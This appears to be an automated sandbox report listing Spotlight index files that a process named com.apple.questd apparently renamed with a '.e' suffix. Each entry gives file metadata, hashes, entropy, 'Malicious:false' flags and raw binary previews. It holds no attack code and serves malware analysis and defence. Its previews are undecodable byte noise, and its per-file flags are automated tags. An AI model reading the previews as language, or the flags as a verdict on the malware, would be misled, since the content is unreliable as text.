                                                                                                    Preview: ..9....dy...+.]SN.z..jB...w..l....H..i.s.B9.."[bGb.. ....!\..L']..Z./g.Ui.w`\...z......}&&y..zf$.."......t>.. (Ff...s.=..F.wC.........B..S.;..AJ.F+L...5.....,.H(.G...d..........a.0..:G.|.....<l^..[L=.......Bs....J..g/8.b..<tb...g.n..=m..9o..%b~........0.#..u....c.!...U......p...`.se_+...q.:....l$i:#..f......d.[.T.....O..*v...V5...|.ty..P...O.n"..z..P....w...v.g.........D,o.X.?......:.M...k.;....q.QBd.&.7t...M.$.%..._.W....,.r......../s...hl-.7^....{..0.....Fo...[.......10*...>..2.&........%.""...jT..O.b*.5.-.i...&..B...|...B...=p...6.|.{.... ...E.VF....TX7.l..D.6....8_...J.{4......o..|..n=y..I'o)0....:.,.........J2....F;.*".+U..u.\........W.+.e.+..3)s.=0e...W.........a.i..%&...O<V..1....Yn|.O..X$3....D......J....T6.y..z.:^!...u.....c."oxP^tY......*R...2.....\j.....2w.dH..E.g.....H./....p..K.....?...yM..p_y..*}..-.<9a....3....\..g..iw...........i...(.+...|..`..,.......s..-e..)........wt:....wS...f.0.S5'.x`.*.62...1~*..'...i5K....k.l.j..Q..c.M...E..0. ..{/>..l(..3...#...3.......p..J.P..w
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/..store.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:DBase 3 data file with memo(s) (334223647 records)
                                                                                                    Size (bytes):906025
                                                                                                    Entropy (8bit):6.999244190980595
                                                                                                    Encrypted:false
                                                                                                    MD5:9544506DC75A675A6786CDF7BCD2ADF3
                                                                                                    SHA1:3DB2F3EF6F1BED8D1150A04E48E2DD06422DB79B
                                                                                                    SHA-256:808BD9D6BDE7097DE54A21F4F554697BE9DBBA15790EC564117CDB34F334B16E
                                                                                                    SHA-512:8031B529DB2A5E5DD5AA54FF28C3C88EEF418CE2542141BE36195012BBCAE973BCA00F4E131AF3AC6E21CAAEE1EB941E532987E5BE32D487495856EDAD7EB2D5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...;.....4...4G.OC...cwu..~.Jp.2....G._...W...4..^O[.Q4Z.......$.P.74............L.D<.+.........................................................................................................................................................................................................................................'.........-..:........d..e....,..MN.z>...sw..P...D.~g.|B.....4].$v0.}.f.................................................................................................................................................................................................%..,Q..3.X...7.+._J9s.)..................9.o..h$.=.e......../..:.........................................................................................................w..A..3........tlG.l.......................\..........._.......C.5..'..UV......R..ZV[.......v..K..}"...!..x4g..s.._...E........1..Zh.(.....B.8N.......,Zp....I...(.w....P.74...Z.X..x.5k..uS.GW........................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexArrays.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Size (bytes):788842
                                                                                                    Entropy (8bit):7.524796552572687
                                                                                                    Encrypted:false
                                                                                                    MD5:7C8D2B1E50DF6E4F902F93FF81B19AE0
                                                                                                    SHA1:86E35408973D20E1BFDB224D83D2568DB2B514D5
                                                                                                    SHA-256:7F0D2B3C9CDABCDDF9D8BEB0AC1A7FC3916E252F5235CEB8DB4DE66D78DD7CB8
                                                                                                    SHA-512:868BA04FD37FFCAA35C07ECB469F35D4B552CF756D18385ADBACAC2617E6204B7BECBC1485D4D93A48F3E9B0140E36D983FFD153F386774486982FE58BB0364E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....\.............................................................4t.Y.I..d.O}.......-WP...........J'F....=.8.l..L..$..f....|:..[..v.,*.w.Iu....L0...t*G.IP@'6..7.HlL.I....)..n...Q.X..7.E..0..h...w..7.^F...DE..z...g|....l.i.....'..<.V."`....T.:...A.Z&9..l..EA...v..iD.r.Ub....v..}..f.Pf..<......pd.....M.|U......M:W-.XI..9w..D.&....'....H+D.......'.vKZ.-.....=..J..+.L"L..0n.BY..M.7...q..@u....9..L.b[/|.Uv..!z..'.Yh.......~.<B...g..3...Z......`pN6..~..F....H......W{.....:.0...Q...e.n,v.QR.k........U.........Y..",...1AG&`..O&...........d.a.9.......+\....k.........J7..0...Q....Q..2...%...z....\...}:..F......E..0..h.....L.%...9.7....@.=.c8u..".R...~~-i9.K......u.Ia.R...z..B$........y.E@...lD.u..0...Q..8;../...~.....)..&...V.3...4.h..... .u..tA.......C..}........6...3;..0lb...f.....~.+..s.M/)8.R6..E..0..hs.9.V.......X.~o..._F-;r&...7...k,...-...{aia..5.+....xF.....Z.X....\$....|0.{8..=..]p@.{..$.?bC.=..5G......{......}"..z}a;....."......`.XckkAf.:-.d!..3.&.)_.3y."..;..1..2FE..O...c*....%..u.#m
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexBigDates.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7706
                                                                                                    Entropy (8bit):3.448636074626998
                                                                                                    Encrypted:false
                                                                                                    MD5:0E6DA87143F53977A1F86BE8AB2F1CC5
                                                                                                    SHA1:D495A747E8362C12582A654E30A7C94C5E824593
                                                                                                    SHA-256:5E31C281E4041591BAFB923E09D63A155BF1C053D42997AB7CC5A93CD27001C7
                                                                                                    SHA-512:7133346B4E11022AC36826C0F3458660B9504D9D2F1DF637438DABF41F89A69748D355608EAAD4CC1AE06BF3471C52E319E48043AE67EADC7C15BD0857D779B3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexCompactDirectory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Size (bytes):67406
                                                                                                    Entropy (8bit):5.866855605741372
                                                                                                    Encrypted:false
                                                                                                    MD5:76549A9173922AED20CF4EA44AB5E1CD
                                                                                                    SHA1:971CD8EA09E8F709F4B634B006C9A545B16FF56E
                                                                                                    SHA-256:F9548B106D118D7C101A99AA6438587CF8FC40DA70D16ED9233E88011C7CF01A
                                                                                                    SHA-512:206EBDB52A21A06D3C8090327E54CD275D87FE5A37166C96237E3E921CB3A072673718183F279255C1C89C9C5E6AEA9B13C1EC99196D53B4C78AEBF7D735B363
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....\...&.......z=..yi.=.................a.^........................................4.3.G.WbF$....................5.pE........................................-+.)..o....................t.Q.^.....H ..F.................g..R...m.R|W..9..%....+...........#...P..6P.,.......5..................................................kL_.I............#.. .rV+MfJe1O?C.*...f6....."..Z...N.NaQ...m.....p..D+Q...B1..i........................................................................................]...4..m.........................>&..y.G..x.'..}..z.^r....3..^........P....%......a.91.Bsy..`G.0...K.M/...E..=.j.:.. _.......p.....E..RM......................................................................................................................................................................~.........................[....m...........................L.D<.+..`...=P*................3!u.fr2#............................................\....)..o............EI.........,c..................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexDirectory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Size (bytes):4426
                                                                                                    Entropy (8bit):5.233764459654074
                                                                                                    Encrypted:false
                                                                                                    MD5:E6E773D1D4107F4C14D7E16AEA426D98
                                                                                                    SHA1:0AE42FEF76802CF14D1CAF9F88F858C09809E4CF
                                                                                                    SHA-256:662D1E54CBECDFABD5E32DB96A9A41E1366BD891164988F4AF546BF221C123A0
                                                                                                    SHA-512:736449BC3B9FE160877B8EEB7572AB91C15BB42AF671595930FA974F5B6DA0C564E7E640F3CD998CEE9C26859B162B38672171C0897302FFC8970017ED3E4F83
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....\............................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexGroups.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2162
                                                                                                    Entropy (8bit):3.990578456561021
                                                                                                    Encrypted:false
                                                                                                    MD5:9FAE50179B30DF43181A257ED752185B
                                                                                                    SHA1:2EAE8D7DFEDAE4043DF310C6A5C898C4E48BCAA5
                                                                                                    SHA-256:25B8F87EBAD9375401578018FB2CED89434CE9C3F056120838914FDE986A0BA8
                                                                                                    SHA-512:744863E7E424B905D2EF5F1445684D6E4D963ACC7B32AFE2AFDC871DC5F15E505AF953A0E8E9A000DD0D81F4E63DC5548F2EF1AD304010E9788DDE0A08CD863C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...p8u.=........................................................................gn..'sEy........................................................................................................................................................................................................................................................gn..'sEy........................................................................................................................................................................................................................................................gn..'sEy........................................................................................................................................................................................................................................................gn..'sEy................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexHead.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.8993899473549116
                                                                                                    Encrypted:false
                                                                                                    MD5:7561C24D76F11C4E2F3B98457A6E59A8
                                                                                                    SHA1:C24BB3DC5FD333BDB53A65744E0187FE11EAB011
                                                                                                    SHA-256:C266157575DAD53FFB870E3D451C088366C49EB7A265388675A00773C9F2DB5C
                                                                                                    SHA-512:D47C5B8A523EB8F8E88698B73D4B063915C1FC50541D9CCE1E483F82DFCC0DB905B035E0A2AC93C43169B91549295BD95C0860D032AF4E02BF92A145B3E36042
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: M..K..\...0..`..v...hS.....i.*........+....`.[..R..w....s.7l..J...{6.h....g...Q.`.-.o.dJ........V.}.(8.....`G...........a...1..U..Q.Tejjxm.~..SAg|.L....D..m..7Y....>.~..^.."r...................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexIds.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):15098
                                                                                                    Entropy (8bit):7.977843769480377
                                                                                                    Encrypted:false
                                                                                                    MD5:569A048EE636C4690FAE510BB06EDC17
                                                                                                    SHA1:12578F7C38D1AF3D3D1BD8F641C25891581077B9
                                                                                                    SHA-256:749F40A983DCAA2584A91D0FFA854AA1C107B6D3B3623CFE0302323766D3AC0E
                                                                                                    SHA-512:15264F6DF7993AF13A5916F9E486A9395100A7097023FF561CAE62AD2964B4CE58D1AE77FC862A1DDFCED7462366113AD25866778B11319FB424CD315D5E9F1A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .........bC&..'....]...aqp..h.Q.....si.uo,.......1.....\.K..3...@........3H.|}.X........=...(C..`g.......d+....p...MJ7bR7.^f...(.mS~/...En..>.+..|1m..6......e.JD.(.p.!..;m...#....p{4.....U.[..Q.F.U..7.$q.E}........i....................B.d9U{gI.u...``...|..0.......'J...Z%k..K.....b...qg......,.1n?.. .........s..YL D...;mY&.n.......Y..z.._G2(...$C ....X.=.h.9 SW.}.T....Y.e..7^.&xV.S.t ......&X.....(.....V...L....u..I.{..=...P1.j.2Xg...(...?.r.O.......o..4..9..w..H..U1..uW.....)EFH........_=.n9.(..w.?....v.]K..........A..p8.....3..g....c.@W.Y.{..to..<|.#..<rYhfa...B+1.".W...A...........j..ni.}....\........7..."QvT.Z........"....m...9.Y>...Rg7=-2q..[.A.,..{..1O....[to.N..U..S........re...wc.w.z{2.)..J....?.y<Vs..MP._).&2y..B-...OR....e ].^y<.N(+>....(Jf.%T............c.....c....<t...H7.1...?...k4.s..g......J....>a...bz."..9.[..MeI.BWi..^Z...9..;v.Oi-H.Pc..).... R.....N\.y..S.....LpM..$..`.1.Vr...Ma.O...................,...<.;:6.[.QTd$U...ok.....S.sT..Z(..(...,."\.S..NT......p...o....^E....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexPositions.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):953204
                                                                                                    Entropy (8bit):7.99982184742754
                                                                                                    Encrypted:true
                                                                                                    MD5:DAB9C2E04540BE5CDCC156E5EFB6157E
                                                                                                    SHA1:F07C5EA3104A111C8B214395ACA7FA002779C98C
                                                                                                    SHA-256:087016EBBB55C557FC76A36E13E6439BB12ED6700128FAF053CC29DF7D60BE51
                                                                                                    SHA-512:10C9670AB6E28D4AAA0C3F2B2CDD7085245E61001CCA016A697C0910C925A2583454DF6C7988F5528DF618C4A024F51B1A01FC7FAB307E74754B4FB60B2B858F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..........?V.Q...np.............\t..z....v.`.nRu...S.c.,.......;...f...G`.y%.^......t$..[)....H@w..X...VA.....KK.}..._.=&...rZ:*=.e.....w.K..,@P.%..8....@.. .H.P..y.'.<.J.....[...m.{co..-]~..a.m....W.....W..[o.@|R.....19..L..M&.{...^{E}=e.F<.(Ts.LV%..>.d..*...Q..7..5.rRw........rR.9.~d.@....SU.#.^j...`.b....,.H`._{A.U.......".:.B&...b_?.....Lx....s(,...T}.~.1u.y.lY..JA..G........Z4=...W.I....M.w..xw|..oAy....;......8v.m.I/..mM..,.bn....(ne..5FSn.q_s...{.k..X.!L.q./...J>.k...t.2yGK.s... .......B/.E]#...E..9.c...D...+.a............|..R&..$.DZ..:...&O!GZ....<8.k..b-.......v...p.F.%.(....GDO....1....-./F.....A...R....h.....::.4..K..5......|*&s..X9`./pp."...!.q-h9O_...AhPD.-............iZ.....8..N&x.t.p.b.xX.R..5.&."s....==\....*......(...........hp.#...Ts.R[SI..U....4yM,....q.b.@...p..........@.V!..)9K..Q'....Iq....O..(....i.q-.9.'.qC.I..gw..r6.;Mj(.H.e7.X..]*b...hk]dx...G...|....8.m."`..%.M....h7^.....Np....}/..a,]tV)M*\x.K..P4.e..!.o..I..X.3..\..@#......~.....{...N8..}.+^.h......s}.b....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexPostings.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):617567
                                                                                                    Entropy (8bit):7.999611020630599
                                                                                                    Encrypted:true
                                                                                                    MD5:D2DDD19815F5C78A7397FAB015B2AF6E
                                                                                                    SHA1:89B5D6846589FE0D7F53F792582C96FDF8CF3D66
                                                                                                    SHA-256:748FCD13DC5AA7E2D48C1695BAD2DA620617A687C391753E354EB02AF5A34D3C
                                                                                                    SHA-512:015C4DF869D7C78E85B01A858ADC7D5BA9E0B39A4B8BC1D8DE1E0F257EABC7869203092EC9A72501E043FDE8026B4661C0990C31E46B61C34376D70446910511
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..............{.YKr.p...t..W;4j....=.\.u*..v!......>6....K........_.t.b=....7...{,*..q.o....c...,t5...xQ.^..w<......f$..N.;=.....3H.|Sb..C.%....5...8..Fd.I..~.........Y3.....D{.W.'.....f.b8........\_H......M&0....b.....ZG...b....fS..Ei.kDl9>1.n..'$+.../.....0F.v.@[F..y......D..j.7..is.\.C......s.Y=....................B..%..>..B.hbB.<-..LH.+...tO.oE.H.&...O.c..]...'......v}{.............J/ .r.Ch......../.s..>..B.3....fY....[&..*H.9.n...t.....z\B.e.\*J.W..yn&.Km74'8z.u*SD...E;z..x....)g.q'.2..)TQ.3....w..J.]]j..2...?W"....u.......-.G%....r..bt.....b.....'(V.P..u..).G<...&C....h..K...#..TB2B.....6...fO...&......":.O5.r...,@....>..!e...#}..w.p......`9sb....~G....*.<f.\4........M.^^ykk...b...U...K.F.".O....5.X.%..K&..P{.K.v.....u.j...<.!.....u...)....e.I?....h..E..`.....Q.t...*...m....;.u.....3......,6<$..r...K..y....zYB.s.......p.b.y...u..z.....)W..~..t..8@~6...W%.=..R.7v..#h.j...i>.M..............n...l.0.].....!.s.C.]5....U......S<C.=.......R+.].F...w...*.. ............x[...{..B.f7...#.Zd
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexUpdates.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):322
                                                                                                    Entropy (8bit):4.4845203871483745
                                                                                                    Encrypted:false
                                                                                                    MD5:5CA44F96D351765B21C397B6616745B7
                                                                                                    SHA1:E7564D50C13CE8D969675B89571F076159C529C3
                                                                                                    SHA-256:FFCAC39C99DBC617347A56B96E475E673DF00D0F869936C871AF93426137448D
                                                                                                    SHA-512:183BFAAAFA32F04CF3A99D5677B87D84D55A6527B4BAD81C2AD962DF6CBD20F12BA943762166DE829F79FC63E7C71F5425A96F6AE89F3343C12FA38BEBAB186A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: UY..G....._^^[z...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.shadowIndexGroups.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2162
                                                                                                    Entropy (8bit):3.990229294904146
                                                                                                    Encrypted:false
                                                                                                    MD5:46FB0CA89FCF6B3A060581090FB57092
                                                                                                    SHA1:C6DC21284279E20A837D3C1FC28473280240598B
                                                                                                    SHA-256:E99A3B711049881558A073B10EDB2C3D2D8DF6E97AEA386FBAEBE8F93A47913D
                                                                                                    SHA-512:E1A593A01C03C8EB63D824B76F226D4719EC62BAA9820479077BC1B7BEF6FB01C37A201CCDB24FE6A58AAC2841E640FE8C8B05A6D7255D0BF682030ACEC9E6DE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...p8u.=........................................................................gn..'sEy........................................................................................................................................................................................................................................................gn..'sEy........................................................................................................................................................................................................................................................gn..'sEy........................................................................................................................................................................................................................................................gn..'sEy................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.shadowIndexHead.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.91663827686622
                                                                                                    Encrypted:false
                                                                                                    MD5:3A9D3DC6B8BB2CB4CDC856EB83D4DF7D
                                                                                                    SHA1:814BFF761501639576077D2A434083563DBD10D4
                                                                                                    SHA-256:F29DC7C896C11978AF7254348957AB2ACD453EB824F9A315879894258983A47C
                                                                                                    SHA-512:CA019EF5AAD2F5904A93C28FDE7FD62F0AF48D4B8C21A18B89E8EE0F6043FD9FD6335458D912BAB6EA8432119389B0E0A438E2682CB538D567F77066481A1CD0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....).....0..`..v...hS.....i.*........+....`.[..R..w....s.7l..J...{6.h....g...Q.`.-.o.dJ........V.}.(8.....`G...........a...1..U..Q.Tejjxm.~..SAg|.L....D..m..7Y....>.~..^.."r...................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.indexState.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):338
                                                                                                    Entropy (8bit):4.705524717090456
                                                                                                    Encrypted:false
                                                                                                    MD5:2E942E9879ACA2A08CCF57631D8EDAA3
                                                                                                    SHA1:79042CAFF94FA793AF672416F50DA096D279EE9E
                                                                                                    SHA-256:759DB9AC8505E41CC888F86595504F6365721DAB3C4018D19594E89A12D4B780
                                                                                                    SHA-512:DC2E7AA90289AE2623B9BC4EBDA7B1C421E5665F4B8D8CA875D1F326E58E0EF9361B50F7AC8431601BCF5E33BC3649BC2961C4F3AE8B5ADF0DA38CFA7882725C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .O....,`..V.9-M.R...@+{.....\....!................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.directoryStoreFile.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Size (bytes):65877
                                                                                                    Entropy (8bit):3.228202649963514
                                                                                                    Encrypted:false
                                                                                                    MD5:328F2866A897BD98CD8546B773732952
                                                                                                    SHA1:F3079C290C9938FFCBF10015E9AB579D97590C75
                                                                                                    SHA-256:D3200F7BD6A1962064EE1287BBDBEA0777CFDFBC934199743150040DAE0AE71F
                                                                                                    SHA-512:BDBCCEE6B8FC01A41BB22CD6D5601A72FE8DB1E3D246D711BFF7ECA5BDACFB642CF0D4980EE8D94BDC5534AC487E7A2432B312199D49D261CE8789671C8C5625
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....\................................................................|....S.z??..L.D<.+.%R4,.....................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.directoryStoreFile.shadow.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Size (bytes):1402
                                                                                                    Entropy (8bit):4.320331982306702
                                                                                                    Encrypted:false
                                                                                                    MD5:A8DA2F2C7CBED3FB1BF1706C67066447
                                                                                                    SHA1:1FC4779F8D0DC3845D8DC0FACAB8E95A173AF20E
                                                                                                    SHA-256:ECEEC6C3B65D537444FD097CE9DFAA51355BF3A5B8556EC182EC06EDB7915349
                                                                                                    SHA-512:BE268566F4B84A27721F2BF5670B144D7D8520A56D22CEAAD0CFC4B5C81E1EC8DD951A2300E6422C4D8632A89B80ACEF55472A6C52994607387AD6AAEED7ECEB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....\................................................................|....S.z??..L.D<.+.%R4,.....................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexArrays.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Size (bytes):65877
                                                                                                    Entropy (8bit):3.227746390902215
                                                                                                    Encrypted:false
                                                                                                    MD5:5E171BA558F99366AAC9BCC89EBAB80F
                                                                                                    SHA1:6C07088FECE83CD1C7893F4C0DD0364518EB766D
                                                                                                    SHA-256:A63CC74761BF7870FB4987083FBE48B22DF65B6B011C3D1D2A55CE2E9426CE4C
                                                                                                    SHA-512:03CEF9845B8CDA6658ED194A83782E4143EACC5885C3ADF768711BAA5FB258A32ED04942EAC6BDC0200969FA413FB9A4555713F6FAC7FAE4E8BF84FD7AE1636B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....\............................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexBigDates.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):16698
                                                                                                    Entropy (8bit):3.321176969345833
                                                                                                    Encrypted:false
                                                                                                    MD5:62ABAB625273BB44B61F2263D6EFEB7C
                                                                                                    SHA1:F3FB6C2CEBC89B28EFE924129C41BF7E6EB8D401
                                                                                                    SHA-256:3A672B9A3FC8C843C69ACF426FC9411F6586B40DF6B4A5C2F5F0F7F1A6F37E56
                                                                                                    SHA-512:37446548A3E8E8AF468C112E58012356F252FB069E0746D2E205E3043527430E2B716A4B6781FA7AE8655D1C1883AF4D3ADD86AEC77AD41C0797EEE73DC399E1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexCompactDirectory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Size (bytes):1338
                                                                                                    Entropy (8bit):4.23328981192097
                                                                                                    Encrypted:false
                                                                                                    MD5:4B3576D757CF9AB2D1CD5A6DCC11AB31
                                                                                                    SHA1:8EEFDEF5AA52F447C09879578D3F0D63D147A25D
                                                                                                    SHA-256:A1FB21D1CEB6A73D4A40AB98DCAEE19591127ADBEA94E90AFC35F2721A0FE3C5
                                                                                                    SHA-512:9881CA66D64C6D499C5A2523DA6923D1B9C5655C56F33B6E6BE5A4CECC2AE84828D2C4118B42725E6A4172DED9D8840C61C7CCC44611EB9A25716B089A3859D2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....\............................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexDirectory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Size (bytes):8538
                                                                                                    Entropy (8bit):3.4439971191375203
                                                                                                    Encrypted:false
                                                                                                    MD5:2F2FA85A5B56EE13CA5FA8E4CFFE59C8
                                                                                                    SHA1:DB6D72E319AD4F6F3C4F44D4E681A5BAC97D656B
                                                                                                    SHA-256:D3887D1D58D81FD3F83B6B92EC2EB2C5C30E4C87B6F308DE60AAE85EB288B169
                                                                                                    SHA-512:BAC4BFC1DDD646E6D3EDAA6ED7E64ED74969B8B2FE19AAF7B5E90EA3DABF97A00EE864ADE4D46C91D8B511CE519883D3C02B1B750CC0572B93893D2A739CE100
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....\............................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexGroups.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.6127178229263612
                                                                                                    Encrypted:false
                                                                                                    MD5:5726273102FF36F8E4D249823B76C52B
                                                                                                    SHA1:6A5CAA6F71216B8C3A5835AE22FC1787D773390D
                                                                                                    SHA-256:194741E3033739148D5F9A190EB9C02EAC8111CB7279E872628E26D779E69709
                                                                                                    SHA-512:4B16F6ACD62F3D92C092CF9DBA63E28AE8E95E1921BAF92B2E7FF988BB27060F54540DB18770A35717DEFE8C237DB646B22E54EACB20113D39F9AD7E7A83F9E7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexHead.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.8371214623905567
                                                                                                    Encrypted:false
                                                                                                    MD5:2DD659932515041424658B89852EFFB6
                                                                                                    SHA1:EC8A7E3C75AD2E8DB8EF57677DDFFC36A489B7AC
                                                                                                    SHA-256:33794A44EDAF94ADF0172B697CF5A5E0481466CB88DEDD4137961500F01A7DE8
                                                                                                    SHA-512:981F0904A1C51829D0A793C306CCFB9CE958592DECED11F4B8D91C2C124E40A34493082DBD524224A274501A979344DA0F1B373BF1F3FFC74EED3842345B22F6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...c.....b..1...r}4........1k...a..v...L...sf..H).R.,\##d....k..................!c...t..........'<1...f|~.....}P..#an.Fr.`m.v.........s.6.c.B.UG.................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexIds.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
